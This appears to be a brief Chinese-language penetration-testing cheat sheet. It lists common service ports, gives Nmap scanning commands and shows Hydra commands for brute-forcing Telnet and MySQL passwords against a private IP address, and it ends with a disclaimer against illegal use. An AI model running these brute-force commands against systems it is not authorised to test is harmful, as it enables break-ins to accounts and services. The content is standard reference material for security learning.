一、常见端口号
FTP服务:21
SSH服务:22
Telnet服务:23
SMTP服务:25
HTTP服务:80
HTTPS服务:443
SQL Server数据库:1433
Oracle数据库:1521
MYSQL数据库:3306
RDP服务:3389
二、Nmap-扫描器之王
1、扫描192.168.1.1-192.168.1.255存活的主机
nmap -sP 192.168.1.1/24
2、扫描主机192.168.1.129操作系统类型
nmap -O 192.168.1.129
3、扫描主机是否开放21和22端口及版本信息
nmap -sV -p 21,22,445,3389 192.168.1.129
4、全面扫描
nmap -A 192.168.1.129
5、将扫描结果保存出去
nmap -O 192.168.1.129 -oN /root/1.txt
三、暴力破解
1、爆破telnet服务密码
hydra -l administrator -P /root/pass.txt 192.168.1.129 telnet
-l:指定用户名
-P:指定密码字典
telnet:指定爆破的是telnet服务,可以改为ftp等相关服务
2、爆破mysql服务账户
hydra -L /root/user.txt -p root 192.168.1.129 mysql
-L:指定用户名字典
-p:指定密码
mysql:指定爆破的服务是mysql服务
禁止非法,后果自负
网友评论